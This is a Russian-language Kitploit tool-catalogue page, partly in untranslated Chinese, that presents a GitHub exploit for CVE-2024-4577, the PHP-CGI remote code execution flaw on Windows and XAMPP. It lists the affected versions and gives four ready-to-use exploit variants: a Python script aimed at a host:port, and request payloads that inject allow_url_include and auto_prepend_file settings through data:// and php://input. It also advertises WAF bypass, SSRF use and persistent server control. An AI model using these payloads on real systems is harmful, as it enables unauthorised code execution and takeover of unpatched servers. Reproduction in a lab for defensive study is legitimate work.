Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/xcanwin/cve-2024-4577-php-rce
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбход WAFТестирование на ПроникновениеРазработка Полезной Нагрузки
GitHubxcanwin/cve-2024-4577-php-rce

CVE-2024-4577-PHP-RCE

[Воспроизведение уязвимости] Первый в мире эксплойт для уязвимости CVE-2024-4577 PHP-CGI RCE, использующий стандартную среду PHP (XAMPP).

Репозиторий
1623342 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-4577-PHP-RCE

Описание проекта и принцип действия

  • Первый в мире эксплойт CVE-2024-4577 PHP-CGI RCE, использующий среду PHP по умолчанию (XAMPP).
  • Первый в мире эксплойт CVE-2024-4577 PHP-CGI RCE, использующий стандартную среду PHP. Предоставляется оригинальный эксплойт, поддерживается SSRF, поддерживается обход WAF.
  • Реализует RCE в стандартной среде PHP. Принцип: cgi.force_redirect + REDIRECT-STATUS.
  • Добавлен оригинальный EXP для сценариев обхода WAF. Принцип: создание FastCGI-сервера + взаимодействие по протоколу FastCGI.
  • Добавлен оригинальный EXP для сценариев SSRF. Принцип: протокол data:// + GET-запрос.

Преимущества EXP 1

  • Для RCE не требуются allow_url_include, auto_prepend_file, auto_append_file. Можно подключать любые файлы и PHP-файлы.
  • Отсутствуют ключевые слова, которые WAF часто блокирует: , , .
allow_url_include
auto_prepend_file
auto_append_file
  • Весь обмен данными с FastCGI-сервером не фиксируется WAF.
  • Прослушивает новый порт, поэтому обеспечивает постоянный контроль над PHP-сервером независимо от Apache и PHP.
  • Сведения об уязвимости

    ИнформацияСодержание
    Название уязвимостиPHP RCE
    Идентификатор уязвимостиCVE-2024-4577
    Уровень рискаВысокий
    Тип уязвимостиRCE
    Сложность эксплуатацииНизкая

    Затронутые версии

    • PHP для Windows 8.3.0 <= затронутые версии < 8.3.8
    • PHP для Windows 8.2.0 <= затронутые версии < 8.2.20
    • PHP для Windows 8.1.0 <= затронутые версии < 8.1.29
    • PHP для Windows затронутые версии == 8.0.x
    • PHP для Windows затронутые версии == 7.x
    • PHP для Windows затронутые версии == 5.x
    • XAMPP для Windows 8.2.0 <= затронутые версии <= 8.2.12
    • XAMPP для Windows 8.1.0 <= затронутые версии <= 8.1.25
    • XAMPP для Windows затронутые версии == 8.0.x
    • XAMPP для Windows затронутые версии == 7.x
    • XAMPP для Windows затронутые версии == 5.x

    EXP 1

    Может использоваться в сценариях обхода WAF + в стандартном сценарии:

    root@kitploit:~
    python CVE-2024-4577-PHP-RCE.py PhpServerHost:PhpServerPort
    

    Например:

    root@kitploit:~
    python CVE-2024-4577-PHP-RCE.py 123.123.123.123:80
    

    EXP 2

    Может использоваться в сценариях SSRF + в стандартном сценарии:

    root@kitploit:~
    http://PhpServerHost:PhpServerPort/php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+-d+allow_url_include%3d1+-d+auto_prepend_file%3d"data:XCANWIN/XCANWIN;base64,PD9waHAgZGllKCJUZSIuInNUIik7Pz4g"
    

    EXP 3

    Может использоваться в стандартном сценарии:

    root@kitploit:~
    POST /php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
    Host: PhpServerHost
    
    <?php die("Te"."sT");?>
    

    EXP 4

    Может использоваться в стандартном сценарии:

    root@kitploit:~
    POST /php-cgi/php-cgi.exe?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
    Host: PhpServerHost
    REDIRECT-STATUS: XCANWIN
    
    <?php die("Te"."sT");?>
    

    Воспроизведение

    1. Окружение сервера:
    root@kitploit:~
    XAMPP Windows版 8.2.12
    
    1. Загрузите и установите XAMPP на сервер:
    root@kitploit:~
    https://zenlayer.dl.sourceforge.net/project/xampp/XAMPP%20Windows/8.2.12/xampp-windows-x64-8.2.12-0-VS16-installer.exe?viasf=1
    
    或者自主去这里挑受影响版本:https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/
    
    
    1. Конфигурация сервера
    root@kitploit:~
    无需任何修改,保持默认配置
    
    1. Используйте EXP на клиенте
    root@kitploit:~
    使用上述EXP进行测试
    
    1. Проверка
    root@kitploit:~
    观察是否返回字符串 "TesT" 或者服务端system.ini文件内容
    
    Скачать инструмент